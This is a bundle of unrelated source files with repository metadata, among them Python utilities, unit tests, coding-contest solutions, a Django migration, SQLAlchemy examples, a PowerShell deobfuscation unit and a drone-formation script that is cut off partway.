01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 224
|
py
|
def segundos_entre(x,y):
t1 = datetime.strptime(x, "%H:%M:%S")
t2 = datetime.strptime(y, "%H:%M:%S")
t2 - t1
a = (t2 - t1).seconds
return f'A diferença entre os horários {x} e {y} é: {a} segundos'
|
[
"you@example.com"
] |
you@example.com
|
871eb6e8ee0778f806cecd0362c54b91bff6028c
|
d6e90e0326248389768fc9b6aece86b70e16f3e5
|
/code_examples/gnuradio/module_fmcw/gr-radar/python/qa_FMCW_separate_IQ_cc.py
|
7933b4c9829cbf1f1334c20a93dcfcf5f7cdd61a
|
[] |
no_license
|
stwunsch/gsoc-proposal
|
22d1d8f23b2f6008e59f80c4a51aab50a04b3e85
|
75d37e8a1e6d16ad0798bf3e7b4ab067d24f9a18
|
refs/heads/master
| 2021-01-19T16:57:41.145819
| 2014-04-14T16:15:08
| 2014-04-14T16:15:08
| 17,761,313
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,891
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2013 <+YOU OR YOUR COMPANY+>.
#
# This is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest,blocks
import radar_swig as radar
class qa_FMCW_separate_IQ_cc (gr_unittest.TestCase):
def setUp (self):
self.tb = gr.top_block ()
def tearDown (self):
self.tb = None
def test_001_t (self):
# set up fg
data = ( complex(1,1),complex(2,2),complex(3,3),complex(4,4),complex(5,5),complex(6,6) )
src = blocks.vector_source_c( data )
test = radar.FMCW_separate_IQ_cc(2)
snk1 = blocks.vector_sink_c(2)
snk2 = blocks.vector_sink_c(2)
snk3 = blocks.vector_sink_c(2)
self.tb.connect(src,test)
self.tb.connect((test,0),snk1)
self.tb.connect((test,1),snk2)
self.tb.connect((test,2),snk3)
self.tb.run ()
# check data
data1 = ( complex(1,1),complex(2,2) )
data2 = ( complex(3,3),complex(4,4) )
data3 = ( complex(5,5),complex(6,6) )
self.assertTupleEqual(data1,snk1.data())
self.assertTupleEqual(data2,snk2.data())
self.assertTupleEqual(data3,snk3.data())
if __name__ == '__main__':
gr_unittest.run(qa_FMCW_separate_IQ_cc, "qa_FMCW_separate_IQ_cc.xml")
|
[
"stefan.wunsch@student.kit.edu"
] |
stefan.wunsch@student.kit.edu
|
e0935743f7688c9951a2d83812994aded07c6dba
|
ce378bf28153d4d30cd53ec8684e8017abd0ac59
|
/pythonProject/leetcode/Rotate Array.py
|
abac0295ceee22ace5ca239c758306f05baeca4e
|
[] |
no_license
|
zzong2006/coding-problems-study
|
5f006b39264cbe43d11db489ce8b716272329b6e
|
9b3affbeb2ddfa673c1d879fb865408e34955c5c
|
refs/heads/master
| 2023-04-07T12:47:41.646054
| 2021-04-08T05:02:33
| 2021-04-08T05:02:33
| 286,918,250
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 696
|
py
|
class Solution(object):
def rotate(self, nums, k):
"""
:type nums: List[int]
:type k: int
:rtype: None Do not return anything, modify nums in-place instead.
"""
print(nums)
n = len(nums)
k %= n
for i in range(n // 2):
nums[i], nums[n - i - 1] = nums[n - i - 1], nums[i]
print(nums)
for i in range(k // 2):
nums[i], nums[k - i - 1] = nums[k - i - 1], nums[i]
print(nums)
for i in range(k, (n + k - 1) // 2 + 1):
nums[i], nums[n - i + k - 1] = nums[n - i + k - 1], nums[i]
print(nums)
a = Solution()
a.rotate([1, 2, 3, 4, 5, 6, 7, 8, 9], k=3)
|
[
"zzong2006@gmail.com"
] |
zzong2006@gmail.com
|
e2141bfbe1940d48e60d545306ad35b1aa55f3e8
|
60f3c767c9f1a700c9e67dac606b8ee3bc46450d
|
/example.py
|
bb8e0450c336caa9837456280eb09470e3379615
|
[] |
no_license
|
codesharedot/Quadratic-Line-Chart-Sandra
|
57b999e12d7ae20b3f907697b2f739c64a45db11
|
9e4eae6d10fc4001464a80de7c7cf5c4e2d6b115
|
refs/heads/master
| 2020-07-26T12:24:34.892400
| 2019-09-15T19:04:04
| 2019-09-15T19:04:04
| 208,642,944
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 147
|
py
|
import matplotlib.pyplot as plt
import numpy as np
x = np.linspace(-1, 1, 50)
y = 9*x*x
plt.plot(x, y,'c-',linewidth=10)
plt.savefig('chart.png')
|
[
"codeto@sent.com"
] |
codeto@sent.com
|
6796233cc8e0d68532199b60208872e887b79dbe
|
8af6f0195e94908482ca7236bcd2eae382605fa7
|
/python3code/chapter03/fibs.py
|
82488642ecd1ea7d7ff1edce7bf88be46820530f
|
[] |
no_license
|
MeatStack/StarterLearningPython
|
4a1e0fc94c4615022ba9ff41455c4e67bd16a5bd
|
98f0a9028f40db189cf2636a5e0c3abbcd86f71d
|
refs/heads/master
| 2020-03-23T16:21:02.884442
| 2018-07-21T11:24:11
| 2018-07-21T11:24:11
| 141,805,470
| 1
| 0
| null | 2018-07-21T11:15:42
| 2018-07-21T11:15:42
| null |
UTF-8
|
Python
| false
| false
| 191
|
py
|
# coding=utf-8
'''
filename: fibs.py
'''
def fibs(n):
result = [0,1]
for i in range(n-2):
result.append(result[-2] + result[-1])
return result
lst = fibs(10)
print(lst)
|
[
"qiwsir@gmail.com"
] |
qiwsir@gmail.com
|
641eb5e4ce8f4443864024b99da2a1c4b80e0d83
|
167face5e34f69ba36b8a8d93306387dcaa50d24
|
/15formatando_strings.py
|
1061eb1748036704fe55492e86c058ee0f7e4ae9
|
[] |
no_license
|
william-cirico/python-study
|
4fbe20936c46af6115f0d88ad861c71e6273db71
|
5923268fea4c78707fe82f1f609535a69859d0df
|
refs/heads/main
| 2023-04-19T03:49:23.237829
| 2021-05-03T01:24:56
| 2021-05-03T01:24:56
| 309,492,617
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 364
|
py
|
# É possível formatar strings das seguintes formas:
nome = "William Círico"
idade = 20
peso = 70.31287418293472
print("Nome: ", nome, "Idade: ", idade, "Peso: ", peso)
print("Nome: {0} Idade: {1} Peso: {2}".format(nome, idade, peso))
print("Nome: {n} Idade: {i} Peso: {p}".format(n=nome, i=idade, p=peso))
print(f"Nome: {nome} Idade: {idade} Peso: {peso:.2f}")
|
[
"contato.williamc@gmail.com"
] |
contato.williamc@gmail.com
|
17ebc93a0e4a5b9f3bdb7c23942b97a73909d91d
|
0bc4391986b15c706a77e5df314ec83e84375c54
|
/articles/migrations/0002_article_image_thumbnail.py
|
dd12130bb4ff92b2ae300134423a7f1d034fcd9b
|
[] |
no_license
|
ssshhh0402/django-crud
|
a6d1a0872942c6215b1130a44ae335182c42937d
|
da292c07c9f77526bee8cbbec07d37ea8464d6af
|
refs/heads/master
| 2022-05-02T12:07:26.518798
| 2019-09-23T06:26:43
| 2019-09-23T06:26:43
| 203,089,241
| 0
| 0
| null | 2022-04-22T22:11:46
| 2019-08-19T03:07:54
|
HTML
|
UTF-8
|
Python
| false
| false
| 443
|
py
|
# Generated by Django 2.2.4 on 2019-09-23 06:07
from django.db import migrations
import imagekit.models.fields
class Migration(migrations.Migration):
dependencies = [
('articles', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='article',
name='image_thumbnail',
field=imagekit.models.fields.ProcessedImageField(blank=True, upload_to=''),
),
]
|
[
"ssshhh0402@naver.com"
] |
ssshhh0402@naver.com
|
df4e2b89e5e838494485cf479d6d0589536e3838
|
fa76cf45d7bf4ed533e5a776ecd52cea15da8c90
|
/robotframework-ls/src/robotframework_debug_adapter/vendored/force_pydevd.py
|
93bcca4fb794844f5a72a146f94071d71202e7a7
|
[
"Apache-2.0"
] |
permissive
|
martinRenou/robotframework-lsp
|
8a5d63b7cc7d320c9fed2372a79c8c6772d6481e
|
5f23b7374139e83d0aa1ebd30675e762d7a0db86
|
refs/heads/master
| 2023-08-18T22:26:01.386975
| 2021-10-25T13:46:11
| 2021-10-25T13:46:11
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,358
|
py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
import contextlib
from importlib import import_module
import os
import sys
VENDORED_ROOT = os.path.dirname(os.path.abspath(__file__))
def project_root(project):
"""Return the path to the root dir of the vendored project.
If "project" is an empty string then the path prefix for vendored
projects (e.g. "robotframework_debug_adapter/_vendored/") will be returned.
"""
if not project:
project = ""
return os.path.join(VENDORED_ROOT, project)
@contextlib.contextmanager
def vendored(project, root=None):
"""A context manager under which the vendored project will be imported."""
if root is None:
root = project_root(project)
# Add the vendored project directory, so that it gets tried first.
sys.path.insert(0, root)
try:
yield root
finally:
sys.path.remove(root)
def preimport(project, modules, **kwargs):
"""Import each of the named modules out of the vendored project."""
with vendored(project, **kwargs):
for name in modules:
import_module(name)
try:
import pydevd # noqa
except ImportError:
pydevd_available = False
else:
pydevd_available = True
if not pydevd_available:
# Constants must be set before importing any other pydevd module
# # due to heavy use of "from" in them.
with vendored("vendored_pydevd"):
try:
pydevd_constants = import_module("_pydevd_bundle.pydevd_constants")
except ImportError as e:
contents = os.listdir(VENDORED_ROOT)
for c in contents[:]:
if os.path.isdir(c):
contents.append(f"{c}/{os.listdir(c)}")
else:
contents.append(c)
s = "\n".join(contents)
msg = f"Vendored root: {VENDORED_ROOT} -- contents:\n{s}"
raise ImportError(msg) from e
# Now make sure all the top-level modules and packages in pydevd are
# loaded. Any pydevd modules that aren't loaded at this point, will
# be loaded using their parent package's __path__ (i.e. one of the
# following).
preimport(
"vendored_pydevd",
[
"_pydev_bundle",
"_pydev_imps",
"_pydev_runfiles",
"_pydevd_bundle",
"_pydevd_frame_eval",
"pydev_ipython",
"pydevd_concurrency_analyser",
"pydevd_plugins",
"pydevd",
],
)
import pydevd # noqa
# Ensure that pydevd uses JSON protocol by default.
from _pydevd_bundle import pydevd_constants
from _pydevd_bundle import pydevd_defaults
pydevd_defaults.PydevdCustomization.DEFAULT_PROTOCOL = (
pydevd_constants.HTTP_JSON_PROTOCOL
)
from robocorp_ls_core.debug_adapter_core.dap.dap_base_schema import (
BaseSchema as RobotSchema,
)
from _pydevd_bundle._debug_adapter.pydevd_base_schema import BaseSchema as PyDevdSchema
PyDevdSchema._obj_id_to_dap_id = RobotSchema._obj_id_to_dap_id
PyDevdSchema._dap_id_to_obj_id = RobotSchema._dap_id_to_obj_id
PyDevdSchema._next_dap_id = RobotSchema._next_dap_id
|
[
"fabiofz@gmail.com"
] |
fabiofz@gmail.com
|
de560c64ba52aaecaeac7ec15a5ce04eb115991c
|
afc8d5a9b1c2dd476ea59a7211b455732806fdfd
|
/Configurations/VBSjjlnu/Full2018v7/conf_test_fatjetscale_DY/configuration.py
|
586bc0ae5cf8cc622910ab866255e792b1b7f1ac
|
[] |
no_license
|
latinos/PlotsConfigurations
|
6d88a5ad828dde4a7f45c68765081ed182fcda21
|
02417839021e2112e740607b0fb78e09b58c930f
|
refs/heads/master
| 2023-08-18T20:39:31.954943
| 2023-08-18T09:23:34
| 2023-08-18T09:23:34
| 39,819,875
| 10
| 63
| null | 2023-08-10T14:08:04
| 2015-07-28T07:36:50
|
Python
|
UTF-8
|
Python
| false
| false
| 950
|
py
|
# Configuration file to produce initial root files -- has both merged and binned ggH samples
treeName = 'Events'
tag = 'DY2018_v7'
# used by mkShape to define output directory for root files
outputDir = 'rootFile'+tag
# file with TTree aliases
aliasesFile = 'aliases.py'
# file with list of variables
variablesFile = 'variables.py'
# file with list of cuts
cutsFile = 'cuts.py'
#cutsFile = 'cuts_topCR.py'
# file with list of samples
samplesFile = 'samples.py'
# file with list of samples
plotFile = 'plot.py'
# luminosity to normalize to (in 1/fb)
lumi = 59.74
# used by mkPlot to define output directory for plots
# different from "outputDir" to do things more tidy
outputDirPlots = 'plots'+tag
# used by mkDatacards to define output directory for datacards
outputDirDatacard = 'datacards'
# structure file for datacard
structureFile = 'structure.py'
# nuisances file for mkDatacards and for mkShape
nuisancesFile = 'nuisances.py'
|
[
"davide.valsecchi@cern.ch"
] |
davide.valsecchi@cern.ch
|
6300090e5a1167be972d853d145e04125121895d
|
ccbcaca6df1c3984a19f039351e29cfa81e73314
|
/timetable/schedule.py
|
a3265c9ffcaa2c76a8c6866709dc7413cf0e18ea
|
[
"BSD-3-Clause"
] |
permissive
|
pgromano/timetable
|
b96c6eb2da8ede8abfa211f6d54748a4a5a9c9c7
|
8fa83fa82bb2afc56f6da1b7f8e3836f2b127164
|
refs/heads/master
| 2021-01-21T00:22:17.376372
| 2016-08-17T14:57:25
| 2016-08-17T14:57:25
| 61,254,584
| 0
| 0
| null | 2016-06-16T02:07:07
| 2016-06-16T02:07:07
| null |
UTF-8
|
Python
| false
| false
| 182
|
py
|
class Schedule(object):
"""Student schedule object.
"""
def __init__(self):
def add(self, course):
"""Add course to schedule"""
def courses
|
[
"zachsailer@gmail.com"
] |
zachsailer@gmail.com
|
507318a00b41ce38db963c43532b962a36ca4c43
|
f3bd271bf00325881fb5b2533b9ef7f7448a75ec
|
/classes/_print32.py
|
fed133646d96b60d6083b2f83a8360c33eb35250
|
[] |
no_license
|
obaica/xcp2k
|
7f99fc9d494859e16b9b0ea8e217b0493f4b2f59
|
6e15c2c95658f545102595dc1783f5e03a9e6916
|
refs/heads/master
| 2020-07-15T17:27:43.378835
| 2019-02-11T16:32:24
| 2019-02-11T16:32:24
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 659
|
py
|
from xcp2k.inputsection import InputSection
from _program_run_info23 import _program_run_info23
from _restart10 import _restart10
from _restart_history4 import _restart_history4
from _current1 import _current1
class _print32(InputSection):
def __init__(self):
InputSection.__init__(self)
self.PROGRAM_RUN_INFO = _program_run_info23()
self.RESTART = _restart10()
self.RESTART_HISTORY = _restart_history4()
self.CURRENT = _current1()
self._name = "PRINT"
self._subsections = {'CURRENT': 'CURRENT', 'RESTART_HISTORY': 'RESTART_HISTORY', 'PROGRAM_RUN_INFO': 'PROGRAM_RUN_INFO', 'RESTART': 'RESTART'}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
31fa6cf28dee74da3917221dcc286b6239f35fdc
|
d5ba475a6a782b0eed5d134b66eb8c601c41421c
|
/terrascript/data/template.py
|
a964634d94047ba5352fbbb1a6371b1e8858546a
|
[
"BSD-2-Clause",
"Python-2.0"
] |
permissive
|
amlodzianowski/python-terrascript
|
ab42a06a5167e53ad8093b656a9bf14a03cb031d
|
142b1a4d1164d1012ac8865d12fdcc72f1e7ae75
|
refs/heads/master
| 2021-05-19T11:59:47.584554
| 2020-03-26T07:13:47
| 2020-03-26T07:13:47
| 251,688,045
| 0
| 0
|
BSD-2-Clause
| 2020-03-31T18:00:22
| 2020-03-31T18:00:22
| null |
UTF-8
|
Python
| false
| false
| 233
|
py
|
# terrascript/data/template.py
import terrascript
class template_file(terrascript.Data):
pass
class template_cloudinit_config(terrascript.Data):
pass
__all__ = [
"template_file",
"template_cloudinit_config",
]
|
[
"markus@juenemann.net"
] |
markus@juenemann.net
|
3e14d69378a30d8887db254aeede0f54138ce747
|
781e2692049e87a4256320c76e82a19be257a05d
|
/all_data/exercism_data/python/matrix/4d38ab06972046a988250a3005464d09.py
|
03b161fe26511da6e0ce058e59c662bf8f099254
|
[] |
no_license
|
itsolutionscorp/AutoStyle-Clustering
|
54bde86fe6dbad35b568b38cfcb14c5ffaab51b0
|
be0e2f635a7558f56c61bc0b36c6146b01d1e6e6
|
refs/heads/master
| 2020-12-11T07:27:19.291038
| 2016-03-16T03:18:00
| 2016-03-16T03:18:42
| 59,454,921
| 4
| 0
| null | 2016-05-23T05:40:56
| 2016-05-23T05:40:56
| null |
UTF-8
|
Python
| false
| false
| 488
|
py
|
class Matrix(object):
def __init__(self, init):
split_at_newline = lambda m: map(lambda s: s.split(), m.split('\n'))
convert_to_int = lambda m: map(lambda s: int(s), m)
column_range = lambda m: range(len(m))
column_member = lambda x, m: map(lambda s: s[x], m)
self.rows = [convert_to_int(row) for row in split_at_newline(init)]
self.columns = [column_member(col, self.rows) for col in column_range(self.rows[0])]
|
[
"rrc@berkeley.edu"
] |
rrc@berkeley.edu
|
91357c211e5073d5b50569facfbbda0b406a9886
|
167c6226bc77c5daaedab007dfdad4377f588ef4
|
/python/ql/test/library-tests/variables/scopes/test.py
|
940576d44dfe9eff4e4399fd52b40809619cecb7
|
[
"MIT",
"LicenseRef-scancode-python-cwi",
"LicenseRef-scancode-other-copyleft",
"GPL-1.0-or-later",
"LicenseRef-scancode-free-unknown",
"Python-2.0"
] |
permissive
|
github/codeql
|
1eebb449a34f774db9e881b52cb8f7a1b1a53612
|
d109637e2d7ab3b819812eb960c05cb31d9d2168
|
refs/heads/main
| 2023-08-20T11:32:39.162059
| 2023-08-18T14:33:32
| 2023-08-18T14:33:32
| 143,040,428
| 5,987
| 1,363
|
MIT
| 2023-09-14T19:36:50
| 2018-07-31T16:35:51
|
CodeQL
|
UTF-8
|
Python
| false
| false
| 987
|
py
|
global0 = 0
global1 = 1
def func0(param0, param1):
return param0 + param1
def func1():
global global0, global_local
local0 = 0
local1 = 1
global_local
global0 = local0 + local1 + global1
def func2():
local2 = 2
def inner1(param2):
local3 = local2
return local3
return inner1
def func3(param4, param5):
local4 = 4
def inner_outer():
def inner2(param3):
return local5 + local4 + param3 + param4
local5 = 3
return inner2(local4 + param4 + param5)
class C(base):
class_local = 7
def meth(self):
mlocal = self
return mlocal
def func4(param6):
class Local:
def meth_inner(self):
return param6
return Local()
def func5(seq):
return [x for x in seq]
def func6(y, z):
return [y+z for y in seq]
#FP observed in sembuild
def use_in_loop(seq):
[v for v in range(3)]
for v in seq:
v #x redefined -- fine in 2 and 3.
|
[
"mark@hotpy.org"
] |
mark@hotpy.org
|
35b5605675d38e47f6e9113f00cec7ad47b2cd14
|
39d26bedd4049d58265fcd6c480cc7a5b73c7ece
|
/Tutorial_SimpleTeacherAPI/python-sample-code/tests/conftest.py
|
5698513372a065217fe1f856dfe1735a2f254317
|
[] |
no_license
|
sramirezh/Developing
|
7adc6dbb5c8436db6a3ab125018186ea7bdd1b40
|
a07ed07899911b9860830f9498c08144c4eca3d4
|
refs/heads/master
| 2022-11-08T01:43:05.755215
| 2021-08-23T03:57:39
| 2021-08-23T03:57:39
| 249,786,342
| 0
| 1
| null | 2022-10-24T21:02:22
| 2020-03-24T18:26:46
|
Python
|
UTF-8
|
Python
| false
| false
| 281
|
py
|
import pytest
@pytest.fixture
def basic_tree():
return [
(23, "23"),
(4, "4"),
(30, "30"),
(11, "11"),
(7, "7"),
(34, "34"),
(20, "20"),
(24, "24"),
(22, "22"),
(15, "15"),
(1, "1")
]
|
[
"sramirez.hinestrosa@gmail.com"
] |
sramirez.hinestrosa@gmail.com
|
5ada850496b766d56da6dc90b7d634e1aa9f19c4
|
1cf3a339c0f94bce94cf142fde9a9f6ab38369a8
|
/yt_arch/core/api_client.py
|
226b998e4c8765b26d726b26d53496c6d0694b0e
|
[
"MIT"
] |
permissive
|
hilbertqqc/youtube-playlist-archiver
|
959f9afc541c293ff05b37b99833f640d39f4c2a
|
69727075e0151d03259c373647278312b11f0299
|
refs/heads/master
| 2023-03-24T03:34:36.507215
| 2021-03-17T20:57:48
| 2021-03-17T20:57:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 235
|
py
|
import httpapiclient
from httpapiclient.mixins import JsonResponseMixin, HelperMethodsMixin
class ApiClient(JsonResponseMixin, HelperMethodsMixin, httpapiclient.BaseApiClient):
base_url = 'https://www.googleapis.com/youtube/v3/'
|
[
"dbashkatov@gmail.com"
] |
dbashkatov@gmail.com
|
243ef68fe11d18e22369979cd2bf46125b0e0df8
|
c97fc7658c39feb51c0ed42c04783797c8675b8a
|
/2018/pcy1/day12_mysql/orm8_fk3_update.py
|
8e4124a903201d0e359e84c71a75f1bf66cd9c77
|
[] |
no_license
|
githubvit/study
|
8bff13b18bea4954e8ed1b4619a091b134b8ff97
|
845e19d1225f1aa51c828b15effac30be42fdc1b
|
refs/heads/master
| 2023-02-20T15:59:19.635611
| 2021-12-15T08:30:54
| 2021-12-15T08:30:54
| 241,928,274
| 1
| 1
| null | 2023-02-02T06:18:48
| 2020-02-20T16:08:06
|
Python
|
UTF-8
|
Python
| false
| false
| 2,731
|
py
|
#_*_coding:utf-8_*_
'''
8,外键foreign key
8.3修改数据
study_record考勤表在插入时stu_id字段为null,修改
'''
from sqlalchemy import create_engine,ForeignKey,bindparam
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Column, Integer, String,DATE,Enum
from sqlalchemy.orm import sessionmaker
# 1,连接数据库
engine = create_engine("mysql+pymysql://root:another333@localhost/test_db",
encoding='utf-8',echo=True)
#mysql+pymysql表示采用pymysql执行原生sql,
#echo=True表示显示创建过程,可以看到生成的原生sql。
# 2,创建表和类的映射
Base = declarative_base() # 生成orm基类
class Student(Base):#建立学生表
__tablename__='student'
id=Column(Integer,primary_key=True)
name=Column(String(32),nullable=False)
register_date=Column(DATE,nullable=False)
class StudyRecody(Base):#建立考勤表
__tablename__='study_record'
id=Column(Integer,primary_key=True)
day=Column(Integer,nullable=False)
status=Column(String(32),nullable=False)
# 3,外键关联,关联student表的id字段
stu_id=Column(Integer,ForeignKey('student.id'))
# 3,创建与数据库的会话session,相当于操作文件的句柄。
Session_class = sessionmaker(bind=engine)# 创建与数据库的会话session class ,注意,这里返回给session的是个class,不是实例
session = Session_class() # 生成session实例
# 4,修改考勤表 update(字典)
# 这是自己参考大量资料,摸索出来的批量更新方法,首先update有where,然后where要绑定参数,这就要在import上引入bindparam。
session.execute(
StudyRecody.__table__.update().where(StudyRecody.id==bindparam('b_id')),
[ {'b_id':1,'day':1,'status':'yes','stu_id':1},
{'b_id':2,'day':1,'status':'yes','stu_id':2},
{'b_id':3,'day':1,'status':'no','stu_id':3},
{'b_id':4,'day':2,'status':'no','stu_id':1},
]
)
'''UPDATE study_record SET day=%(day)s, status=%(status)s WHERE study_record.id = %(b_id)s
这是批量修改的方法,execute可以执行多条数据插入或更新,但是数据的格式必须相同,不可以像:
[{'b_id':1,'day':1,'status':'yes'},
{'b_id':3,'status':'no'}]
这样无法执行,因为第2条需要的原生sql和第一条是不同的'''
'''
上面的执行结果如下:
mysql> select * from study_record;
+----+-----+--------+--------+
| id | day | status | stu_id |
+----+-----+--------+--------+
| 1 | 1 | yes | 1 |
| 2 | 1 | yes | 2 |
| 3 | 1 | no | 3 |
| 4 | 2 | no | 1 |
+----+-----+--------+--------+
4 rows in set (0.00 sec)
mysql>
'''
session.commit()
|
[
"sgq523@163.com"
] |
sgq523@163.com
|
f940bcf1ea682999bed19fc60ca0f4af0c8a6610
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5695413893988352_1/Python/sempav/b.py
|
8ad8a3ac5ec44bbc0fd72c27fcc7cc57a5f07a7f
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,416
|
py
|
POS = 1
NEG = 2
BOTH = 3
NONE = 0
ans_c = ''
ans_j = ''
ans_diff = 10**20
def extract_num(score_str):
pow10 = 1
res = 0
for ch in reversed(score_str):
if ch != '?':
res += (ord(ch) - ord('0')) * pow10
pow10 *= 10
return res
def check(diff, ans, positions, score_c, score_j):
global ans_c
global ans_j
global ans_diff
if abs(diff) > abs(ans_diff):
return
c_str = ''
j_str = ''
for d, p, c, j in zip(ans, positions, score_c, score_j):
if p == NONE:
c_str += c
j_str += j
elif p == BOTH:
if d >= 0:
c_str += str(d)
j_str += '0'
else:
c_str += '0'
j_str += str(-d)
elif p == POS:
c_str += str(d)
j_str += j
else: # p == NEG:
c_str += c
j_str += str(-d)
if abs(diff) < abs(ans_diff):
ans_diff = diff
ans_c = c_str
ans_j = j_str
elif abs(diff) == abs(ans_diff):
c_int = int(c_str)
j_int = int(j_str)
ans_c_int = int(ans_c)
ans_j_int = int(ans_j)
if c_int < ans_c_int:
ans_c = c_str
ans_j = j_str
elif c_int == ans_c_int and j_int < ans_j_int:
ans_c = c_str
ans_j = j_str
def solve(i, ans, diff, positions, score_c, score_j):
if i == len(positions):
check(diff, ans, positions, score_c, score_j)
return
pow10 = 10 ** (len(positions) - i - 1)
if positions[i] == NONE:
ans[i] = 0
solve(i + 1, ans, diff, positions, score_c, score_j)
return
if positions[i] == POS:
cur_range = range(0, 10)
elif positions[i] == NEG:
cur_range = range(-9, 1)
elif positions[i] == BOTH:
cur_range = range(-9, 10)
#print(positions[i], diff, list(cur_range))
just_above = cur_range[-1]
for digit in cur_range:
if diff - pow10 * digit == 0:
just_above = digit
break
if diff - pow10 * digit < 0:
just_above = digit - 1
break
if just_above not in cur_range:
just_above = cur_range[0]
just_below = cur_range[0]
for digit in reversed(cur_range):
if diff - pow10 * digit == 0:
just_below = digit
break
if diff - pow10 * digit > 0:
just_below = digit + 1
break
if just_below not in cur_range:
just_below = cur_range[-1]
ans[i] = just_below
solve(i + 1, ans, diff - pow10 * just_below, positions, score_c, score_j)
ans[i] = just_above
solve(i + 1, ans, diff - pow10 * just_above, positions, score_c, score_j)
t = int(input())
for testCase in range(1, t + 1):
score_c, score_j = input().split()
ans_c = ''
ans_j = ''
ans_diff = 10**20
a = extract_num(score_c)
b = extract_num(score_j)
positions = []
for ch_a, ch_b in zip(score_c, score_j):
if ch_a == '?' and ch_b == '?':
positions.append(BOTH)
elif ch_a == '?':
positions.append(POS)
elif ch_b == '?':
positions.append(NEG)
else:
positions.append(NONE)
ans = [0 for tmp in score_c]
solve(0, ans, b - a, tuple(positions), score_c, score_j)
print('Case #{}: {} {}'.format(testCase, ans_c, ans_j))
|
[
"alexandra1.back@gmail.com"
] |
alexandra1.back@gmail.com
|
e815bc00ac8a9f39a473d1ae169a929143560be6
|
c93f51492cfee3f98040f07d7f4323ec27ac81a5
|
/refinery/units/obfuscation/ps1/concat.py
|
40bc8a8c7d142f8dcdff27d0265cce17adba6673
|
[
"BSD-3-Clause"
] |
permissive
|
prats84/refinery
|
cbe9ebfeb570c9c0531e13bbf13ec18801f12aca
|
5f961051e9cc1857a06108ce4d36a6799ac9d720
|
refs/heads/master
| 2023-07-13T02:32:04.998285
| 2021-08-20T09:08:01
| 2021-08-20T09:08:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,398
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
from .. import IterativeDeobfuscator
from . import string_unquote, string_quote, Ps1StringLiterals
class deob_ps1_concat(IterativeDeobfuscator):
_SENTINEL = re.compile(R'''['"]\s*[+&]\s*['"]''')
def deobfuscate(self, data):
def concat(data):
strlit = Ps1StringLiterals(data)
repeat = True
while repeat:
for match in self._SENTINEL.finditer(data):
a, b = match.span()
a = strlit.get_container(a)
if a is None:
continue
b = strlit.get_container(b)
if b is None or b != a + 1:
continue
a = strlit.ranges[a]
b = strlit.ranges[b]
stra = data[slice(*a)]
strb = data[slice(*b)]
parts = list(string_unquote(stra))
it = iter(string_unquote(strb))
parts[~0] += next(it)
parts.extend(it)
yield data[:a[0]] + string_quote(parts)
data = data[b[1]:]
strlit.update(data)
break
else:
repeat = False
yield data
return ''.join(concat(data))
|
[
"rattle@nullteilerfrei.de"
] |
rattle@nullteilerfrei.de
|
6fc3e353a8326a114fc60b18e3229535220c28c9
|
0a118477c8b6d1ef79b26310a1d3fb06716743e9
|
/contributer_demo/demo2/coordination/formation_demo/my_leader.py
|
6a3f3c47ca5aa8e260d12d37928babc195285821
|
[
"MIT"
] |
permissive
|
nsgcjdsz/XTDrone
|
773ea65421044a895e427cfc68d9e3669210c12a
|
ebefd6cf943b95998e1b47de6be9052a146d667d
|
refs/heads/master
| 2023-08-25T18:12:48.338686
| 2021-10-23T12:03:47
| 2021-10-23T12:03:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,406
|
py
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import rospy
from geometry_msgs.msg import Twist, Vector3, PoseStamped
from std_msgs.msg import String
from pyquaternion import Quaternion
import time
import math
import numpy
import sys
#if sys.argv[2] == '6': #formation_dict是该文件夹下的文件
# from formation_dict import formation_dict_6 as formation_dict
#elif sys.argv[2] == '9':
# from formation_dict import formation_dict_9 as formation_dict
#elif sys.argv[2] == '18':
# from formation_dict import formation_dict_18 as formation_dict
if sys.argv[2] == '21':
from my_formation_dict import formation_dict_my as formation_dict
elif sys.argv[2] == '34':
from my_formation_dict import formation_dict_my as formation_dict
class Leader:
def __init__(self, uav_type, leader_id, uav_num):
self.hover = True
self.id = leader_id
self.local_pose = PoseStamped()
self.cmd_vel_enu = Twist()
self.follower_num = uav_num - 1
self.followers_info = ["Moving"]*self.follower_num
self.follower_arrived_num = 0
